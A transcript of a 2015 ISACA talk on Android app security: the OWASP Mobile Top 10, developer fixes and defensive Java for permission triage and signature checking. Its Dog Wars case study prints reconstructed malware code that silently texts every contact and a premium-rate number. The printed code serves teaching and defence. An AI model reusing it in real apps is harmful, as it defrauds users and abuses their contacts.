ISACA – mobile [in]security (presentation transcript)
Posted on 21-May-2018
Welcome: welcome to my presentation
ISACA – Leeds – 18th November 2015
Please save all questions until the end of the presentation
Let's start!
Agenda
1. About me – Who am I?
2. Introduction to Mobile – Why mobile
3. Mobile Security Challenges – From a business point of view
4. OWASP – Mobile Security Project
5. Common Vulnerabilities – Real examples, including malware
6. Fixes – Develop secure code
7. The future of mobile – Where I see the future going
End of presentation – Thank you for your attention
About Me: Who am I?
Andrew Pannell (Andrew/Andy/Andi)
Ethical Hacking for Computer Security BSc – 25,000 word dissertation: mobile [in]security
OWASP Mobile Security Project – Member, Contributor, Android SME
Penetration Tester – Working for Pentest Limited, based in the London office
CREST ICS Technical Assurance – Industrial Control Systems/SCADA
www.pentest.co.uk
About Us: Who are Pentest?
Pentest Limited
Established in 2001
CREST Member company (Council Registered Ethical Security Testers)
Application security specialists
Research
About You: Who are my audience?
Developers?
Security Professionals?
Apple?
Techies?
Android?
Phones Timeline: How phones have developed
1875 – A.G. Bell invents the telephone
1997 – Nokia 6110: Three games, calculator, works as a pager
1999 – Blackberry 850: First device released under the Blackberry brand
2000 – Nokia 3310: The one your mates had at school. Indestructible
2001 – Symbian S80: Nokia's OS. Runs Java files.
2004 – First mobile virus, "Cabir": Spread via Bluetooth; harmless, shows "Caribe"
2006 – Symbian S60 & Nokia N95: Mandatory code signing
2008 – Apple iPhone and Android: Launch of smartphones with the ability to purchase apps
Present
Mobile Introduction: Big money in mobile
Mobile Statistics
$77 billion per year – Revenue of mobile applications worldwide
100 apps installed – Average number of applications installed per user mobile device
75% fail basic security – According to Gartner, even basic security fails to be implemented on mobile apps
56 million items of data – Unencrypted, unsecured, unprotected private user data
Mobile Security: On average 9 vulnerabilities per application
28% 34% 25% 13%
Low – No direct threat, more a risk, and does not cause damage by itself, but may be leveraged with other vulnerabilities to launch further attacks.
Medium – Imposes some effect/damage on the application. Can assist an attack to launch further attacks.
High – Potential to directly compromise CIA; likelihood is not high. Possible damage is high but not a total disaster.
Critical – Major security risk, with direct exploit. Ability to cause major damage to the application/company. Likelihood is high.
Source: https://www.checkmarx.com/2015/11/05/the-state-of-mobile-app-security/
Android Introduction: Why Android?
1.5 million daily activations with over 1 billion active users
Over 4000 Android devices
83% of worldwide market share
Android Introduction: More about Android
Overview
Part compiled apps
Internal storage and SD card
SQLite database
Activities/Intents/Services/Broadcasts/Content providers
Android Security: Android Security Model
Sandboxing
The Android Application Sandbox, which isolates your app data and code execution from other apps.
Permissions model
User-granted permissions to restrict access to system features and user data.
Application-defined permissions to control application data on a per-app basis.
Application isolation
Business Challenges: Difficulties with mobile
The emergence of mobile as a new technology means new developers, straight out of university, making the same old web security mistakes.
Rush to market, to get there first before competitors.
BYOD means that hostile mobile devices are now connecting to the enterprise environment.
"Mobile devices tend to be misplaced, lost or even stolen"
OWASP Mobile: Open Web Application Security Project
The OWASP Mobile Security Project is a centralized resource intended to give developers and security
teams the resources they need to build and maintain secure mobile applications. Through the project,
our goal is to classify mobile security risks and provide developmental controls to reduce their impact
or likelihood of exploitation.
Our primary focus is at the application layer. While we take into consideration the underlying mobile
platform and carrier inherent risks when threat modelling and building controls, we are targeting the
areas that the average developer can make a difference. Additionally, we focus not only on the mobile
applications deployed to end user devices, but also on the broader server-side infrastructure which the
mobile apps communicate with. We focus heavily on the integration between the mobile application,
remote authentication services, and cloud platform-specific features.
Source: https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
OWASP Mobile Top 10 2015 (DRAFT)
Note: these are in no particular order
Improper Platform Usage
Insecure Data Storage
Insecure Communications
Insecure Authentication
Insufficient Crypto
Insecure Authorisation
Client Code Quality Issues
Code Tampering
Reverse Engineering
Extraneous Functionality
OWASP Mobile: Mobile Top Ten 2015 (BETA)

Improper Platform Usage
Violation of development guidelines for security
Unintentional misuse

Insecure Data Storage
Including unintended data leakage
SQL databases, log files, XML manifest, SD card, cookies, the cloud
Internal processes, caches
Analytics
Impact: Leaving user data unprotected in your app may allow malicious applications to access it

Insecure Communications
Weak SSL versions and ciphers
Weak handshake
Clear text communications
Man-in-the-middle
Impact: Jeopardises the confidentiality of data between your app and the endpoint via MiTM attacks

Insecure Authentication
Bad/weak session management
Predictable identifiers
Session fixation
Failing to log out properly (e.g. only client-side)
Failing to identify a user at all
Impact: Risk of exposing data to unidentified users (e.g. anonymous users) invoking web services

Insufficient Cryptography
Relates to crypto that was attempted, but poorly
Poor key selection (lack of randomness)
Roll your own crypto?!
Impact: User data is likely to be exposed; offline brute force, replay attacks

Insecure Authorisation
Client-based authorisation decisions
Permission when logged in
Impact: Granting access to unauthorised users, invoking or receiving services

Client Code Quality
Ensure secure coding practices during the life cycle
Code-level implementation problems on the mobile client
Buffer overflow, format string vulnerabilities
Impact: Exploiting business logic

Code Tampering
Binary patching
Changes to the application package
Malware
Impact: Subvert/short-circuit licensing, clone the application for malicious purposes

Reverse Engineering
Not always a problem (open source)
Can reveal hidden methods and functionality
May lead to code tampering
Bypass logic
Impact: Bypass security controls and business logic, facilitating other attacks. Business risk, loss of revenue, brand damage, phishing

Extraneous Functionality
Backdoor functionality
Development code left in
Impact: Exposing extra functionality left in for development
Case Study: Dog O War
Mobile malware
Modified legitimate app: Dog Wars by KAGA Games
Malware released in August 2011
Read contacts
Sent texts to contacts
Sent premium rate messages
PETA distanced themselves
Case Study: Dog Wars – Android Manifest

<manifest package="kagegames.apps.DWBeta">
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <meta-data android:name="ADMOB_PUBLISHER_ID" android:value="NOTKAGAEGAMES"/>
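A small permission-triage tool, added here as an example and not part of the original talk: it parses a constructed copy of the manifest above (with an xmlns:android declaration added so a plain DOM parser accepts it) and flags the permission pairs that match the behaviour the case study describes. The pair list is this example's own assumption about what is worth an analyst's attention.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.*;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.*;

public class ManifestTriage {
    // Constructed copy of the Dog Wars manifest from the slide; xmlns:android added so it parses
    static final String DOG_WARS_MANIFEST =
        "<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"kagegames.apps.DWBeta\">"
        + "<uses-permission android:name=\"android.permission.VIBRATE\"/>"
        + "<uses-permission android:name=\"android.permission.INTERNET\"/>"
        + "<uses-permission android:name=\"android.permission.ACCESS_COARSE_LOCATION\"/>"
        + "<uses-permission android:name=\"android.permission.READ_PHONE_STATE\"/>"
        + "<uses-permission android:name=\"android.permission.SEND_SMS\"/>"
        + "<uses-permission android:name=\"android.permission.WRITE_SMS\"/>"
        + "<uses-permission android:name=\"android.permission.READ_CONTACTS\"/>"
        + "<uses-permission android:name=\"android.permission.RECEIVE_BOOT_COMPLETED\"/>"
        + "<meta-data android:name=\"ADMOB_PUBLISHER_ID\" android:value=\"NOTKAGAEGAMES\"/>"
        + "</manifest>";
    // Pairs that together match the slide: read the address book and send SMS, and return after every reboot
    static final String[][] SUSPICIOUS_PAIRS = {
        {"android.permission.READ_CONTACTS", "android.permission.SEND_SMS"},
        {"android.permission.RECEIVE_BOOT_COMPLETED", "android.permission.SEND_SMS"},
    };

    // Collects the android:name of every <uses-permission> element (non-namespace-aware DOM).
    static Set<String> permissions(String manifestXml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
            .parse(new ByteArrayInputStream(manifestXml.getBytes(StandardCharsets.UTF_8)));
        NodeList nodes = doc.getElementsByTagName("uses-permission");
        Set<String> perms = new TreeSet<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            perms.add(((Element) nodes.item(i)).getAttribute("android:name"));
        }
        return perms;
    }

    // One finding per suspicious pair that the manifest declares in full.
    static List<String> findings(Set<String> perms) {
        List<String> out = new ArrayList<>();
        for (String[] pair : SUSPICIOUS_PAIRS) {
            if (perms.containsAll(Arrays.asList(pair))) {
                out.add("requests " + pair[0] + " together with " + pair[1]);
            }
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        Set<String> perms = permissions(DOG_WARS_MANIFEST);
        System.out.println("Declared permissions: " + perms);
        for (String f : findings(perms)) System.out.println("REVIEW: " + f);
    }
}
```

Run against the Dog Wars manifest it reports both pairs; a plain game asking for the same combination deserves the same second look before it reaches a BYOD estate.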
Case Study: Dog Wars – Code

Decompiled from the malware's com.dogbite package; the class declaration, imports and loop structure are restored from the fragment on the slide (onBind and the rest of the class were not shown).

package com.dogbite;

import android.app.Service;
import android.content.Intent;
import android.database.Cursor;
import android.provider.ContactsContract;
import android.telephony.SmsManager;

public class Rabies extends Service {
    @Override
    public void onStart(Intent paramIntent, int paramInt) {
        super.onStart(paramIntent, paramInt);
        // Enumerates the victim's address book (READ_CONTACTS from the manifest)
        Cursor contacts = getContentResolver().query(
                ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
        SmsManager localSmsManager = SmsManager.getDefault();
        if (contacts.getCount() > 0) {
            while (true) {
                if (!contacts.moveToNext()) {
                    // Address book exhausted: one final text to the premium-rate short code (SEND_SMS)
                    localSmsManager.sendTextMessage("73822", null, "text", null, null);
                    break;
                }
                // One message per contact, sent silently with no user interaction
                localSmsManager.sendTextMessage(contacts.getString(contacts.getColumnIndex("data1")),
                        null, "I take pleasure in hurting small animals, just thought you should know that", null, null);
            }
        }
    }
}
Code Example: Streaming App – 1-variable protection

package com.store.app.module.util;

import android.view.Window;
import com.store.app.util.ScreenshotRestriction;
import com.store.app.util.Restriction;

public class RestrictionsModule {
    // The whole screenshot restriction hangs off one hard-coded boolean,
    // so a single patched constant in the APK switches it off (see Code Tampering)
    public static Restriction<Window> screenshotRestrictions() {
        return new ScreenshotRestriction(true);
    }
}
Developer Fixes: How to code securely
1. Code tampering
Prevent reverse engineering by obfuscating code. Check that the APK matches the original to prevent modified code from being run.
2. Insecure data storage
Encrypt application data files. Do not store on the SD card (if possible). Be careful in your choice of analytics.
3. Insecure authorisation and authentication
Assume the device is hostile; validate on the server side.
Developer Fixes: How to code securely
4. Rooted devices
Can you allow a rooted device to run your application? If so, consider presenting a warning to the user regarding the security of their data.
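One way to implement the "check the APK matches" part of fix 1, added here as an example rather than the author's code: compare the SHA-256 of the certificate that signed the running package, obtained through PackageManager.GET_SIGNATURES, with a value baked into the release build. The EXPECTED_CERT_SHA256 placeholder is an assumption to be replaced with the digest of your own release certificate.

```java
import android.content.Context;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.Signature;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public final class SignatureCheck {
    // Hex SHA-256 of the release signing certificate.
    // Placeholder (assumption): replace with the digest of your own certificate.
    private static final String EXPECTED_CERT_SHA256 = "<sha256-of-release-certificate>";

    // True only when the running package carries exactly one signer and that
    // signer's certificate digest matches the value compiled into the app.
    public static boolean isSignedWithReleaseCert(Context ctx) {
        try {
            PackageInfo info = ctx.getPackageManager()
                    .getPackageInfo(ctx.getPackageName(), PackageManager.GET_SIGNATURES);
            Signature[] sigs = info.signatures;
            if (sigs == null || sigs.length != 1) {
                return false; // a missing or extra signer is itself a sign of repackaging
            }
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(sigs[0].toByteArray());
            return constantTimeEquals(toHex(digest), EXPECTED_CERT_SHA256);
        } catch (PackageManager.NameNotFoundException | NoSuchAlgorithmException e) {
            return false; // fail closed rather than assume the package is genuine
        }
    }

    // Compares without stopping at the first differing character.
    static boolean constantTimeEquals(String a, String b) {
        if (a.length() != b.length()) {
            return false;
        }
        int diff = 0;
        for (int i = 0; i < a.length(); i++) {
            diff |= a.charAt(i) ^ b.charAt(i);
        }
        return diff == 0;
    }

    static String toHex(byte[] bytes) {
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }
}
```

Because the check lives in the client it can be patched out like any other constant, so treat it as one layer alongside the obfuscation in fix 1 and the server-side validation in fix 3.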
Mobile Future: Android Wear
Android Wear works in conjunction with a mobile device. Notifications, interactions, fitness and health.

Mobile Future: Android TV
Android TV – Smart TV, Android UI, voice commands, screen casting, internet connected.

Mobile Future: Android Auto
Android Auto extends the functionality of the phone to the car; client-server with the phone, pulls information from sensors.